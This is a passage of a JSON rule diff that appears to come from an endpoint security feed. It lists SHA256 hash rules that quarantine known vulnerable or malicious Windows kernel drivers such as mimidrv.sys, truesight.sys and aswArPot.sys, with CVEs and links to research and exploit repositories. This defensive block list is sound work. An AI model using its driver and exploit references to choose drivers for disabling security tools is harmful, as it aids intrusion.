+ "value": "b0f1fbadc1d7a77557d3d836f7698bd986a3ec9fc5d534ad3403970f071176f7",
+ "comment": "Malicious Kernel Driver (aka a9df5964635ef8bd567ae487c3d214c4.sys) [https://www.loldrivers.io/drivers/ac62e709-4aa5-41f4-87b1-b811283d70d1/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac308b0a-0da6-5a63-95a9-a36d91b82959",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608439Z",
+ "creation_date": "2026-03-23T11:45:29.608441Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608447Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9dab4b6fddc8e1ec0a186aa8382b184a5d52cfcabaaf04ff9e3767021eb09cf4",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac33c23a-b63c-5a85-8f66-416d184c93d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479494Z",
+ "creation_date": "2026-03-23T11:45:30.479496Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479501Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f83465d2c38c20a3854d86c293867de3baae2f90419dbe82405bc9f9dd7bbd8c",
+ "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac34a4bb-cabb-5b12-bfbb-06211fb17fe6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467707Z",
+ "creation_date": "2026-03-23T11:45:30.467710Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467719Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bf2ab728d27075bf2245ddc3257ad8df5179c8c4a449493ea995af9a979d6a2e",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac500047-8912-5920-8a48-b05494b6776f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813504Z",
+ "creation_date": "2026-03-23T11:45:31.813508Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813516Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0d6993f06763fda1aba7f09487c81c378a6e3d435827d15e778fc499826b205",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac514672-2272-5b59-9695-75b97a22e403",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824162Z",
+ "creation_date": "2026-03-23T11:45:30.824165Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824172Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ce6de057bd961747bf279abe43591823512bfc218b3e378357dc3a6282db5cc6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac5576e5-e8b7-5aea-a541-72fe76d717ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149863Z",
+ "creation_date": "2026-03-23T11:45:31.149866Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149886Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b240ed7b56af0a9f695504d388a2cc809de65c912d7cfc343b5335cc6aee59a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac62b5e9-2556-562f-9d96-75d2e7832cf3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978188Z",
+ "creation_date": "2026-03-23T11:45:29.978190Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978196Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "265010deb10af80885726edc450867fa69acbde449b51d13bf891322ff5c1c2d",
+ "comment": "Malicious Kernel Driver (aka 0x3040_blacklotus_beta_driver.sys) [https://www.loldrivers.io/drivers/8750b245-af35-4bc6-9af3-dc858f9db64f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac67d270-0fb9-527b-87d7-ae97189c7d7c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142754Z",
+ "creation_date": "2026-03-23T11:45:31.142756Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142762Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "917b94760c0c98d00ad1f3b6955cba990514e5062ec3c9ab0ba77905972d2cfc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac72a93b-ec40-5cb2-bfa8-d25f0cd94075",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975429Z",
+ "creation_date": "2026-03-23T11:45:29.975431Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975436Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "192a27335de23a008c05efe24ea1fa0f633dd8ddc68d904466e4e2741a0bb645",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac76ff14-b24f-5622-a756-6dfedc236c38",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468259Z",
+ "creation_date": "2026-03-23T11:45:30.468262Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468271Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "770552bfc6598f165443da94ac0c6aca00f95a6a9a8e89713f9980730d9ee9c2",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac7dc6af-2017-52ff-93a4-02537900cb57",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144982Z",
+ "creation_date": "2026-03-23T11:45:31.144984Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144989Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "722ae57db8ce8f7b8cc28714e5c151f812411adbbd27b5e8d5aa75b1f94dd22b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac830ddc-0dfa-54b1-8aa7-93eb3e91b9c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609684Z",
+ "creation_date": "2026-03-23T11:45:29.609686Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609691Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e665962c827ce0adbd29fe6bcf09bbb1d7a7022075d162ff9b65d0af9794ac0",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac889e37-06f3-5744-99e8-e15fee9cf206",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478599Z",
+ "creation_date": "2026-03-23T11:45:31.478603Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478613Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33debab1d4d09a0177eb0dccd4764deebbbc19e214385943e257375921e8a323",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac8bd08d-27d9-5298-85a3-f3b6827ad944",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971857Z",
+ "creation_date": "2026-03-23T11:45:29.971859Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971865Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac96c034-0647-517a-8d83-9ef765ce5e2c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818541Z",
+ "creation_date": "2026-03-23T11:45:30.818543Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818549Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "53b9e423baf946983d03ce309ec5e006ba18c9956dcd97c68a8b714d18c8ffcf",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ac9ef523-c587-564d-9c65-fd574ce547ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154691Z",
+ "creation_date": "2026-03-23T11:45:31.154693Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154699Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "619dc10d02ca22d881f02a70f0ad225f736a6f0fc2e1d29eecc275dc3808d7ba",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aca022ec-227a-5f66-83b9-a313a38489c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494112Z",
+ "creation_date": "2026-03-23T11:45:31.494115Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494124Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c55b9674a4dc7a17515ab97db846ce4cbed9e7f9ce2e3e58d860d71b62d3b32a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aca237bd-25fa-5e77-b203-df275f682bb6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970123Z",
+ "creation_date": "2026-03-23T11:45:29.970125Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970130Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c919efdad21b7d9884903b9d539fbb50dc418ff2c2753c12b35b9ace4c96d73",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aca6bd2b-253b-5e01-aa5a-498210dc63e6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145508Z",
+ "creation_date": "2026-03-23T11:45:32.145510Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145515Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6bc0e1c104fac4a8caa4237c7ae181ca11a043a3ee26426aeb7a90dc40281fad",
+ "comment": "Vulnerable Kernel Driver (aka szkg64.sys) [https://www.loldrivers.io/drivers/375e8de3-aae4-488d-8273-66744978b45f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "acc33743-5704-544c-b2a2-485eb61c28a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969133Z",
+ "creation_date": "2026-03-23T11:45:29.969135Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969141Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a42ebde59e8f63804eaa404f79ee93a16bb33d27fb158c6bfbe6143226899a0",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "acc37293-643e-5fe1-bb73-21d55fd3db4e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487218Z",
+ "creation_date": "2026-03-23T11:45:31.487220Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487225Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c860d22c8a57469b55311b8b6cb3e00eb19b80f94a8da65511faa6a4d1977789",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "acc46334-99cb-5ff2-a332-c8a710273ae3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.471455Z",
+ "creation_date": "2026-03-23T11:45:31.471475Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.471496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ce399c685eafd2405f1c89108fdef0086a759426c0d3546759b8ef0de850b5e",
